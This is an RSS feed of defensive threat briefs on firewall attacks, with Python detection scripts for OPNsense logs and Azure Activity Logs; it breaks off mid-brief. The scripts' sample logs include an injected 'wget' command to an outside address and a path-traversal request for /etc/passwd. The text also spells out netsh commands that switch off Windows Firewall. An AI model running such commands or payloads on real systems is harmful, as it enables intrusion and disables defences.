<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Firewall — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/firewall/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 04 May 2026 11:09:07 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/firewall/feed.xml" rel="self" type="application/rss+xml"/><item><title>OPNsense Multiple Vulnerabilities Leading to Remote Code Execution</title><link>https://feed.craftedsignal.io/briefs/2026-05-opnsense-rce/</link><pubDate>Mon, 04 May 2026 11:09:07 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-opnsense-rce/</guid><description>A remote, anonymous attacker can exploit multiple vulnerabilities in OPNsense to bypass security measures and execute arbitrary code, potentially leading to complete system compromise.</description><content:encoded><![CDATA[<p>Multiple unspecified vulnerabilities in OPNsense allow a remote, anonymous attacker to bypass security restrictions and achieve arbitrary code execution. The vulnerabilities stem from inadequate input validation and insufficient privilege checks within the OPNsense firewall software. While the specific vulnerable components are not detailed in the advisory, successful exploitation would grant an attacker complete control over the affected OPNsense instance. This can lead to a complete breach of the network perimeter, allowing the attacker to pivot to internal systems, intercept network traffic, or disrupt network services. 
Given the critical role of OPNsense as a network gateway, organizations using this software should prioritize detection and mitigation efforts.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable OPNsense instance accessible over the network.</li>
<li>The attacker crafts a malicious request targeting a specific, undisclosed vulnerable endpoint. This request exploits a flaw in input validation or authentication.</li>
<li>The vulnerable OPNsense component processes the malicious request without proper sanitization or authorization checks.</li>
<li>The vulnerable component treats the attacker-controlled input as trusted, potentially passing it to a shell or a privileged helper (a command injection or similar flaw).</li>
<li>The payload runs as arbitrary code on the OPNsense host, giving the attacker an initial foothold.</li>
<li>The attacker leverages the initial foothold to escalate privileges within the OPNsense system.</li>
<li>The attacker establishes persistence, ensuring continued access even after system reboots or security updates.</li>
<li>The attacker pivots to other systems within the network, using the compromised OPNsense instance as a launchpad for further attacks, or exfiltrates sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of these vulnerabilities allows a remote attacker to execute arbitrary code on the OPNsense firewall. This gives the attacker full control of the firewall, allowing them to intercept network traffic, modify firewall rules, and potentially pivot to internal networks. The impact is a complete compromise of the network perimeter, potentially affecting all systems and data behind the firewall. The number of affected organizations is currently unknown.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor the OPNsense web GUI access logs (the GUI is served by lighttpd) for POST requests to endpoints your administrators do not normally use, and for request paths or parameters carrying shell metacharacters or path traversal, using a webserver category Sigma rule (see example below). Because the vulnerable endpoints are undisclosed, baseline the endpoints seen during normal administration and alert on departures from that baseline rather than on a fixed signature.</li>
<li>Implement network intrusion detection systems (NIDS) rules to detect exploitation attempts against OPNsense services, keeping in mind that the GUI is served over TLS: a sensor on the wire sees only the handshake unless traffic is decrypted, so the host-side web logs are the more reliable source for this advisory.</li>
<li>While specific CVEs are unavailable, follow the OPNsense security advisories and release notes and apply updates immediately upon release. Until then, restrict GUI and SSH access to dedicated management networks, which removes the remote, anonymous access path the advisory describes.</li>
</ul>
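<p>To make the log-monitoring recommendation concrete, here is a small hunt over GUI access-log lines. It is an added example written for this brief, not OPNsense code and not the Sigma rule the feed refers to. It assumes the GUI web server (lighttpd) is writing a combined-format access log; the baseline endpoint list, the management networks, the sample log lines and the <code>/api/hypothetical/plugin/run</code> endpoint in them are all constructed for illustration. Since the vulnerable endpoints are undisclosed, the hunt does not look for a signature: it flags POSTs to endpoints outside a baseline, requests whose decoded path or query carries shell metacharacters or traversal, and requests from outside the management networks, and it notes when the server accepted a flagged POST.</p>

```python
"""Hunt for suspicious POSTs in an OPNsense GUI access log.

Added example for this brief, not OPNsense code or the feed's Sigma rule. ASSUMPTIONS: the GUI
web server (lighttpd) writes a combined-format access log; the baseline paths, management
networks and log lines below are constructed, and /api/hypothetical/plugin/run is not a real endpoint.
"""
from __future__ import annotations

import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote, urlsplit

# Combined log format: host ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# ASSUMPTION: endpoints admins normally POST to in this deployment. Derive it from a quiet baseline
# period of your own logs; the GUI path set changes between releases and with installed plugins.
BASELINE_POST_PATHS = {"/index.php", "/api/core/menu/search"}
# ASSUMPTION: networks from which GUI access is expected.
MGMT_NETS = (ip_network("10.0.0.0/24"), ip_network("192.168.1.0/24"))
# Shell metacharacters, CR/LF and traversal in a decoded path or query: the shapes an
# input-validation flaw is usually reached with.
_SUSPICIOUS = re.compile(r"\.\./|[;|`\r\n]|\$\(")


def parse(line: str) -> dict | None:
    m = _LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    # Decode twice so a double-encoded payload (%252e%252e%252f) is seen as ../
    rec["path"] = unquote(unquote(parts.path))
    rec["query"] = unquote(unquote(parts.query))
    return rec


def findings(rec: dict) -> list[str]:
    out = []
    try:
        inside = any(ip_address(rec["ip"]) in net for net in MGMT_NETS)
    except ValueError:  # hostname or garbage in the client field
        inside = False
    if not inside:
        out.append("source_outside_mgmt_nets")
    if rec["method"] == "POST" and rec["path"] not in BASELINE_POST_PATHS:
        out.append("post_to_unbaselined_endpoint")
    if _SUSPICIOUS.search(rec["path"]) or _SUSPICIOUS.search(rec["query"]):
        out.append("metacharacters_in_request")
    # A 2xx/3xx on a flagged POST outranks a 4xx: the server accepted the request.
    if out and rec["method"] == "POST" and rec["status"] // 100 in (2, 3):
        out.append("server_accepted")
    return out


def hunt(lines: list[str]) -> list[dict]:
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            # Count these rather than dropping them; a flood of unparsable lines is itself a signal.
            hits.append({"line": line, "findings": ["unparsable"]})
            continue
        f = findings(rec)
        if f:
            hits.append({"ip": rec["ip"], "method": rec["method"], "path": rec["path"],
                         "status": rec["status"], "ua": rec["ua"], "findings": f})
    return hits


# Constructed log lines; 10.0.0.5 is an admin workstation, 203.0.113.77 an internet source.
SAMPLE_LINES = [
    '10.0.0.5 - - [04/May/2026:10:58:01 +0000] "POST /api/core/menu/search HTTP/1.1" 200 512 "https://fw.example.internal/" "Mozilla/5.0"',
    '10.0.0.5 - - [04/May/2026:10:58:09 +0000] "GET /ui/core/dashboard HTTP/1.1" 200 8213 "-" "Mozilla/5.0"',
    '203.0.113.77 - - [04/May/2026:11:02:14 +0000] "POST /api/hypothetical/plugin/run?cmd=id%3B%20wget%20http%3A%2F%2F203.0.113.77%2Fx HTTP/1.1" 200 44 "-" "python-requests/2.31.0"',
    '203.0.113.77 - - [04/May/2026:11:02:20 +0000] "GET /ui/%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "curl/8.5.0"',
    "not a log line",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LINES):
        print(hit)
```

<p>Build <code>BASELINE_POST_PATHS</code> from a week of your own logs rather than from documentation: the set of GUI endpoints differs between releases and with installed plugins, and an allowlist copied from elsewhere either floods you with alerts or misses the unusual endpoint the recommendation is about.</p>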
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>vulnerability</category><category>rce</category><category>firewall</category></item><item><title>Multiple Vulnerabilities in SonicWall Products Allow for DoS and Security Policy Bypass</title><link>https://feed.craftedsignal.io/briefs/2026-04-sonicwall-vulns/</link><pubDate>Thu, 30 Apr 2026 00:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-sonicwall-vulns/</guid><description>Multiple vulnerabilities in SonicWall firewalls could allow an attacker to cause a remote denial of service and security policy bypass, potentially disrupting network services and compromising security controls.</description><content:encoded><![CDATA[<p>On April 30, 2026, CERT-FR published an advisory regarding multiple vulnerabilities affecting various SonicWall firewall products. These vulnerabilities, detailed in SonicWall security bulletin SNWLID-2026-0004, could allow an unauthenticated remote attacker to trigger a denial-of-service condition or bypass security policies. The affected products include a wide range of SonicWall firewalls across multiple generations (Gen 6, Gen 7, and Gen 8), as well as NSv virtual firewalls deployed in ESX, KVM, Hyper-V, AWS, and Azure environments. Successful exploitation of these vulnerabilities could lead to significant disruption of network services and a compromise of security controls.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable SonicWall firewall exposed to the internet.</li>
<li>The attacker sends a specially crafted network packet to the firewall. This packet exploits one of the vulnerabilities (CVE-2026-0204, CVE-2026-0205, or CVE-2026-0206).</li>
<li>If the attacker exploits one of the DoS vulnerabilities, the affected service fails or the appliance becomes unresponsive, producing a denial-of-service condition.</li>
<li>Legitimate network traffic is disrupted due to the firewall&rsquo;s degraded performance or complete failure.</li>
<li>If the attacker exploits a security policy bypass vulnerability, they can potentially gain unauthorized access to internal network resources.</li>
<li>The attacker may then attempt to move laterally within the network, exploiting additional vulnerabilities in other systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of these vulnerabilities could lead to a complete denial of service, disrupting network connectivity for affected organizations. A security policy bypass could also allow unauthorized access to sensitive internal resources. The number of potential victims is significant, given the widespread use of SonicWall firewalls across various industries.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patches outlined in SonicWall security bulletin SNWLID-2026-0004 to all affected SonicWall firewalls immediately.</li>
<li>Monitor traffic reaching the firewalls&rsquo; internet-facing services for malformed or high-rate requests, and watch the appliances&rsquo; own logs and uptime for unexpected service failures or restarts, the usual symptom of a triggered DoS.</li>
<li>Deploy the Sigma rules below to your SIEM to detect potential exploitation attempts in your environment.</li>
<li>Review and enforce strict network segmentation policies to limit the impact of a potential security policy bypass.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>sonicwall</category><category>firewall</category><category>dos</category><category>security_bypass</category></item><item><title>Interlock Ransomware Campaign Targeting Enterprise Firewalls</title><link>https://feed.craftedsignal.io/briefs/2024-01-interlock-firewall-ransomware/</link><pubDate>Thu, 19 Mar 2026 05:33:30 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-interlock-firewall-ransomware/</guid><description>The Interlock ransomware campaign is targeting enterprise firewalls to encrypt sensitive data and demand ransom payment.</description><content:encoded><![CDATA[<p>The Interlock ransomware campaign specifically targets enterprise firewalls. The campaign&rsquo;s objective is to encrypt sensitive data residing on or accessible through these firewalls, rendering systems inoperable and creating significant business disruption. While specific details about the initial discovery and scope of the campaign remain limited, its focus on firewalls suggests a targeted approach aimed at organizations heavily reliant on these devices for network security and perimeter defense. The lack of specific details about delivery mechanisms and exploited vulnerabilities underscores the need for proactive threat hunting and vulnerability management to detect and mitigate potential Interlock ransomware infections.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> The attacker gains initial access to the targeted network, potentially through exploiting vulnerabilities in the firewall&rsquo;s management interface or VPN services.</li>
<li><strong>Firewall Compromise:</strong> The attacker exploits the initial access to compromise the firewall device. This may involve exploiting known vulnerabilities or using stolen credentials.</li>
<li><strong>Lateral Movement:</strong> The attacker uses the compromised firewall as a pivot point to move laterally within the internal network. Tools like <code>ssh</code> or <code>PsExec</code> may be used.</li>
<li><strong>Discovery:</strong> The attacker performs reconnaissance to identify valuable data stores accessible through the firewall. This may involve scanning network shares or querying databases.</li>
<li><strong>Privilege Escalation:</strong> The attacker attempts to escalate privileges to gain administrative access to critical systems. This could involve exploiting vulnerabilities or using credential harvesting techniques.</li>
<li><strong>Exfiltration (Possible):</strong> Depending on the attacker&rsquo;s goals, data may be exfiltrated before encryption begins.</li>
<li><strong>Data Encryption:</strong> The attacker deploys the Interlock ransomware payload to encrypt sensitive data on systems accessible via the firewall.</li>
<li><strong>Ransom Demand:</strong> After encryption, the attacker delivers a ransom note demanding payment for decryption keys.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful Interlock ransomware attack can lead to significant data loss, business disruption, and financial damage. Organizations can suffer reputational damage and legal repercussions due to data breaches. The targeted nature of the attack suggests a focus on organizations where firewall compromise would have a widespread impact, potentially affecting hundreds or thousands of users or customers.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable enhanced logging on all enterprise firewalls to capture detailed activity, including login attempts, configuration changes, and network traffic. This enhances the effectiveness of the detection rules below.</li>
<li>Implement multi-factor authentication (MFA) for all firewall administrative access to mitigate the risk of credential theft.</li>
<li>Regularly patch and update firewall firmware to address known vulnerabilities.</li>
<li>Deploy the Sigma rules provided in this brief to your SIEM and tune for your environment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ransomware</category><category>firewall</category><category>network</category></item><item><title>Azure Firewall Rule Collection Modification or Deletion</title><link>https://feed.craftedsignal.io/briefs/2024-01-azure-firewall-rule-collection-modification/</link><pubDate>Wed, 31 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-azure-firewall-rule-collection-modification/</guid><description>An attacker may modify or delete Azure Firewall rule collections (Application, NAT, and Network) to impair defenses and potentially enable malicious traffic.</description><content:encoded><![CDATA[<p>The modification or deletion of Azure Firewall rule collections (Application, NAT, and Network) can indicate malicious activity within an Azure environment. Threat actors may target these rules to bypass security controls, allowing unauthorized network traffic, enabling data exfiltration, or facilitating lateral movement. Monitoring these changes is crucial for maintaining the integrity of network security policies and detecting potential breaches. This activity directly impacts an organization&rsquo;s ability to enforce its security posture, potentially exposing sensitive resources to unauthorized access.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to the Azure environment, potentially through compromised credentials or a vulnerability in an application.</li>
<li>The attacker enumerates existing Azure Firewall resources to identify rule collections (Application, NAT, and Network) that can be modified or deleted.</li>
<li>The attacker uses valid Azure credentials or exploits a misconfiguration to authenticate to the Azure Resource Manager API.</li>
<li>The attacker crafts a malicious request to modify the target rule collection, potentially altering allowed ports, IP addresses, or protocols.</li>
<li>Alternatively, the attacker crafts a request to delete an entire rule collection, effectively disabling its associated security controls.</li>
<li>The attacker sends the request to the Azure Resource Manager API, executing the change to the firewall configuration.</li>
<li>The modified or deleted rule collection now allows unauthorized traffic to bypass the firewall, potentially enabling lateral movement or data exfiltration.</li>
<li>The attacker exploits the newly opened network paths to achieve their final objective, such as deploying ransomware or accessing sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful modification or deletion of Azure Firewall rule collections can have significant consequences. Unauthorized traffic could bypass security controls, enabling data exfiltration, lateral movement, or the deployment of malware. This could lead to data breaches, service disruptions, and financial losses. The impact depends on the scope of the modified or deleted rule collection and the resources it protects.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Azure Firewall Rule Collection Modified or Deleted&rdquo; to your SIEM and tune for your environment to detect unauthorized changes to firewall configurations.</li>
<li>Review Azure Activity Logs for any events matching the <code>operationName</code> values specified in the Sigma rule to identify suspicious activity.</li>
<li>Implement multi-factor authentication (MFA) for all Azure accounts, especially those with permissions to manage firewall resources, to reduce the risk of credential compromise.</li>
<li>Regularly audit Azure role-based access control (RBAC) assignments to ensure the principle of least privilege is followed and that only authorized users have permissions to modify firewall configurations.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>azure</category><category>firewall</category><category>defense-impairment</category></item><item><title>Azure Firewall Modification or Deletion Detected</title><link>https://feed.craftedsignal.io/briefs/2024-01-azure-firewall-modified-or-deleted/</link><pubDate>Wed, 03 Jan 2024 18:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-azure-firewall-modified-or-deleted/</guid><description>An Azure firewall was created, modified, or deleted, potentially indicating malicious activity aimed at impairing network defenses.</description><content:encoded><![CDATA[<p>This alert identifies potentially malicious modifications or deletions of Azure firewalls. Azure firewalls are critical components for network security, controlling inbound and outbound traffic based on defined rules. An attacker who gains sufficient privileges within an Azure environment may attempt to disable or modify these firewalls to facilitate lateral movement, data exfiltration, or other malicious activities. This activity is particularly concerning as it represents a direct attempt to weaken the victim&rsquo;s security posture. The activity is detected via Azure Activity Logs. While legitimate administrative actions can trigger this alert, any unexpected or unauthorized changes to firewall configurations should be investigated promptly.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to an Azure environment, possibly through compromised credentials or exploiting a vulnerability in an application.</li>
<li>Attacker escalates privileges within the Azure subscription to gain permissions to manage network resources, including firewalls.</li>
<li>Attacker identifies the Azure firewalls in the target environment using Azure Resource Manager APIs or the Azure portal.</li>
<li>Attacker modifies firewall rules to allow unauthorized traffic, such as opening ports for command and control communication or disabling security rules. This is achieved via the <code>MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE</code> operation.</li>
<li>Alternatively, the attacker deletes the Azure firewall using the <code>MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE</code> operation, effectively removing network protections.</li>
<li>Attacker validates that their changes have been successfully applied by testing network connectivity or by reviewing the firewall configuration.</li>
<li>Attacker performs malicious activities such as lateral movement, data exfiltration, or deploying additional resources without firewall restrictions.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful modification or deletion of Azure firewalls can have severe consequences. An attacker can bypass network security controls, leading to data breaches, unauthorized access to sensitive resources, and the potential for widespread disruption. This can result in financial losses, reputational damage, and regulatory penalties.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect unauthorized firewall modifications or deletions in Azure Activity Logs.</li>
<li>Investigate any alerts triggered by the Sigma rule, focusing on unfamiliar user identities and user agents.</li>
<li>Review Azure RBAC roles and permissions to ensure the principle of least privilege is enforced, limiting the ability of users and service principals to modify or delete firewalls.</li>
<li>Monitor Azure Activity Logs for other suspicious activities, such as unusual resource deployments or changes to security settings.</li>
</ul>
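<p>The two Azure briefs above (changes to rule collections, and changes to the firewall resource itself) can be served by one triage function over Activity Log records. This is an added example, not the feed&rsquo;s Sigma rule and not Microsoft code. The two top-level operation names come from the brief; the per-collection operation names are an assumption that follows the Resource Manager naming convention and must be confirmed against your own tenant&rsquo;s Activity Log before you rely on them. The record layout is a simplified version of the Activity Log export, and every event is constructed.</p>

```python
"""Triage Azure Firewall changes from Activity Log records.

Added example for the two Azure briefs; record layout and events are constructed.
"""
from __future__ import annotations

# Operations named in the briefs: changes to the firewall resource itself.
FIREWALL_OPS = {
    "MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE",
    "MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE",
}
# Per-collection operations. ASSUMPTION: built from the Resource Manager convention
# provider/resource/child/verb; confirm against your own tenant's Activity Log before relying on them.
RULE_COLLECTION_OPS = {
    f"MICROSOFT.NETWORK/AZUREFIREWALLS/{kind}RULECOLLECTIONS/{verb}"
    for kind in ("APPLICATION", "NAT", "NETWORK")
    for verb in ("WRITE", "DELETE")
}
# Outcome values in this example's simplified layout. Resource Manager logs a Start record and
# then the outcome for every write, so matching on operation name alone doubles each alert.
_OUTCOMES = ("Success", "Failure")


def triage(events: list[dict], expected_callers: set[str] | frozenset[str] = frozenset()) -> list[dict]:
    """Return one alert per completed (or failed) firewall or rule-collection change.

    expected_callers: principals (IaC pipeline service principals, break-glass accounts) whose
    changes are routine; they are still reported, but flagged so an automation step can auto-close.
    """
    known = {c.lower() for c in expected_callers}
    alerts = []
    for ev in events:
        op = ev.get("operationName", "").upper()
        if op in FIREWALL_OPS:
            scope = "firewall"
        elif op in RULE_COLLECTION_OPS:
            scope = "rule_collection"
        else:
            continue
        if ev.get("resultType") not in _OUTCOMES:
            continue  # Start record; wait for the outcome
        caller = ev.get("caller", "")
        alerts.append({
            "time": ev.get("time"),
            "scope": scope,
            "action": "delete" if op.endswith("/DELETE") else "modify",
            "succeeded": ev["resultType"] == "Success",
            "caller": caller,
            "callerIp": ev.get("callerIpAddress"),
            "resourceId": ev.get("resourceId"),
            "expected_caller": caller.lower() in known,
        })
    return alerts


# Constructed events. Subscription and resource names are placeholders.
_FW = ("/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-hub"
       "/providers/Microsoft.Network/azureFirewalls/fw-hub")
SAMPLE_EVENTS = [
    {"time": "2024-01-31T11:58:02Z", "operationName": "MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE",
     "resultType": "Start", "caller": "sp-network-iac", "callerIpAddress": "10.20.0.4", "resourceId": _FW},
    {"time": "2024-01-31T11:58:41Z", "operationName": "MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE",
     "resultType": "Success", "caller": "sp-network-iac", "callerIpAddress": "10.20.0.4", "resourceId": _FW},
    {"time": "2024-01-31T13:07:15Z",
     "operationName": "MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE",
     "resultType": "Success", "caller": "contractor@example.com", "callerIpAddress": "203.0.113.9",
     "resourceId": _FW + "/networkRuleCollections/deny-egress"},
    {"time": "2024-01-31T13:09:40Z", "operationName": "MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE",
     "resultType": "Failure", "caller": "contractor@example.com", "callerIpAddress": "203.0.113.9", "resourceId": _FW},
    {"time": "2024-01-31T13:10:01Z", "operationName": "MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE",
     "resultType": "Success", "caller": "contractor@example.com", "callerIpAddress": "203.0.113.9",
     "resourceId": "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-hub"
                   "/providers/Microsoft.Network/networkSecurityGroups/nsg-app"},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS, expected_callers={"sp-network-iac"}):
        flag = "routine" if a["expected_caller"] else "INVESTIGATE"
        outcome = "ok" if a["succeeded"] else "FAILED"
        print(flag, a["scope"], a["action"], outcome, a["caller"], a["callerIp"], a["resourceId"])
```

<p>The function keys on the outcome record and keeps failed attempts: a delete that failed for lack of permission says as much about the caller as a successful one, and on the sample data it is the same external identity that succeeded in removing a rule collection two minutes earlier.</p>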
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>azure</category><category>firewall</category><category>defense-evasion</category></item><item><title>Windows Firewall Disabled via Netsh</title><link>https://feed.craftedsignal.io/briefs/2024-01-disable-windows-firewall-rules/</link><pubDate>Wed, 03 Jan 2024 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-disable-windows-firewall-rules/</guid><description>Detection of adversaries disabling Windows Firewall rules using the `netsh.exe` command-line tool to weaken defenses and facilitate unauthorized network activity.</description><content:encoded><![CDATA[<p>Attackers commonly use the <code>netsh.exe</code> utility, a command-line scripting tool, to manage network configurations. Abusers leverage <code>netsh.exe</code> to disable or modify Windows Firewall rules, a built-in host-based firewall. This manipulation weakens the system&rsquo;s defenses, allowing unauthorized network traffic and enabling lateral movement within the compromised environment. The activity allows for command and control communications and unhindered exploitation of internal resources. Defenders must monitor <code>netsh.exe</code> executions for unexpected firewall modifications.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial Access: An attacker gains initial access to a Windows system through various means such as phishing or exploiting a vulnerability.</li>
<li>Privilege Escalation: The attacker escalates privileges to a level sufficient to modify firewall settings.</li>
<li>Discovery: The attacker uses reconnaissance techniques to identify existing firewall rules.</li>
<li>Defense Evasion: The attacker uses <code>netsh.exe</code> to disable specific firewall rules, using commands like <code>netsh advfirewall firewall set rule name=&quot;rule_name&quot; new enable=no</code>.</li>
<li>Defense Evasion: Alternatively, the attacker disables the entire firewall using <code>netsh advfirewall set allprofiles state off</code>.</li>
<li>Lateral Movement: With the firewall weakened, the attacker moves laterally to other systems on the network.</li>
<li>Command and Control: The attacker establishes command and control channels, which may now be unimpeded by firewall rules.</li>
<li>Impact: The attacker achieves their objectives, such as data exfiltration, ransomware deployment, or further compromise of the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful disabling of Windows Firewall rules can lead to significant security breaches. Attackers can move laterally within the network, compromise additional systems, and exfiltrate sensitive data. The impact can range from data loss and financial damage to reputational harm and legal consequences. The defense evasion enables attackers to establish persistent command and control channels, maintain a long-term presence within the compromised environment and conduct further malicious activities.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable process creation logging with command-line capture (Sysmon Event ID 1, or Security Event ID 4688 with &ldquo;Include command line in process creation events&rdquo; enabled) so that <code>netsh.exe</code> executions and their arguments reach the SIEM.</li>
<li>Deploy the Sigma rules in this brief to your SIEM to detect attempts to disable Windows Firewall rules via <code>netsh.exe</code>. Tune the rules for your specific environment.</li>
<li>Investigate any alerts generated by the Sigma rules, focusing on identifying the user account, process execution chain, and the specific firewall rules being modified.</li>
<li>Implement strict access controls to limit the number of users with the privileges necessary to modify firewall settings.</li>
<li>Regularly review and audit firewall configurations to ensure they are properly configured and have not been tampered with.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>defense-evasion</category><category>windows</category><category>firewall</category></item><item><title>Windows Netsh Tool Used for Firewall Discovery</title><link>https://feed.craftedsignal.io/briefs/2024-01-netsh-firewall-discovery/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-netsh-firewall-discovery/</guid><description>The analytic detects the execution of the Windows built-in tool netsh.exe to display the state, configuration, and profile of the host firewall, potentially leading to unauthorized network access or data exfiltration.</description><content:encoded><![CDATA[<p>This detection focuses on identifying instances where the <code>netsh.exe</code> utility is used to query firewall configurations on a Windows system. While <code>netsh.exe</code> is a legitimate tool for network configuration, adversaries can leverage it to gather information about firewall rules and settings. This information can then be used to plan further attacks, such as bypassing firewall restrictions or identifying vulnerable network services. This activity is typically seen during the reconnaissance phase of an attack. The scope of this detection covers any Windows environment where Endpoint Detection and Response (EDR) logs are available.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to a compromised system through various means, such as phishing or exploiting a vulnerability.</li>
<li>The attacker executes <code>netsh.exe</code> with commands that enumerate firewall state and rules, using either the legacy context (<code>netsh firewall show state</code>, <code>netsh firewall show config</code>) or the current one (<code>netsh advfirewall show allprofiles</code>, <code>netsh advfirewall firewall show rule name=all</code>); detections that key only on the legacy <code>firewall</code> keyword miss the latter.</li>
<li>The <code>netsh.exe</code> process retrieves the requested firewall information from the Windows operating system.</li>
<li>The collected firewall information is parsed to identify potential weaknesses or misconfigurations.</li>
<li>The attacker uses the gathered information to modify existing firewall rules or create new rules to allow unauthorized access.</li>
<li>The attacker leverages the modified firewall configuration to establish a covert communication channel or to move laterally within the network.</li>
<li>The attacker attempts to exfiltrate sensitive data or deploy ransomware.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to unauthorized network access, data exfiltration, or the deployment of ransomware. The enumeration of firewall configurations can provide attackers with valuable insights into the network&rsquo;s security posture, enabling them to bypass security controls and compromise critical assets. This can result in significant financial losses, reputational damage, and disruption of business operations.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect Suspicious Netsh Firewall Discovery</code> to your SIEM and tune for your environment to detect netsh.exe executions with firewall discovery commands.</li>
<li>Enable Sysmon process-creation logging (Event ID 1) to capture the necessary command-line details.</li>
<li>Investigate any identified instances of <code>netsh.exe</code> being used to query firewall settings, especially when initiated from unusual processes or user accounts.</li>
<li>Monitor parent-child process relationships to identify suspicious process spawning, as highlighted by the <code>Processes.parent_process_name</code> field.</li>
<li>Review firewall configurations regularly to identify and remediate any misconfigurations or overly permissive rules.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>discovery</category><category>windows</category><category>netsh</category><category>firewall</category></item><item><title>Windows Host Network Discovery Enabled via Netsh</title><link>https://feed.craftedsignal.io/briefs/2024-01-enable-network-discovery/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-enable-network-discovery/</guid><description>Attackers can enable host network discovery via netsh.exe to weaken host firewall settings, facilitating lateral movement by identifying other systems on the network.</description><content:encoded><![CDATA[<p>Attackers can leverage the <code>netsh.exe</code> utility to modify Windows Firewall settings, specifically enabling Network Discovery. This setting allows a host to broadcast its presence and services, making it easier for attackers to identify potential targets within the network for lateral movement. The behavior is often a post-exploitation technique to weaken host-based defenses after gaining initial access. The modification uses netsh.exe, a command-line scripting utility for managing network configurations. This activity can be easily scripted and automated, making it a common step in reconnaissance and lateral movement playbooks. Defenders should monitor for unauthorized use of <code>netsh.exe</code> to modify firewall settings.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a Windows host.</li>
<li>Attacker executes <code>netsh.exe</code> with elevated privileges.</li>
<li><code>netsh.exe</code> is used to modify the Windows Firewall configuration.</li>
